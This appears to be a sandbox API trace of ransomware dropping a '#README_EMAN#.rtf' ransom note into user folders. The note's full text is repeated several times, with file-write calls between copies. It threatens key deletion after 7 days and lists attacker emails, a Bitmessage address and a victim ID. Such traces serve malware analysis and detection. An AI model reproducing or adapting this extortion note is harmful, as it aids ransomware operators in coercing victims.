Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nxà­Å(\x177\x16\x8fØQ¨nL\x0bÍQ\x07FôÁÓDÓÎ\x01", lpUsedDefaultChar=0x0) returned 8717 [0280.279] WriteFile (in: hFile=0x2c8, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0280.280] CloseHandle (hObject=0x2c8) returned 1 [0280.280] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0280.280] GetLastError () returned 0x2 [0280.280] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0280.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES 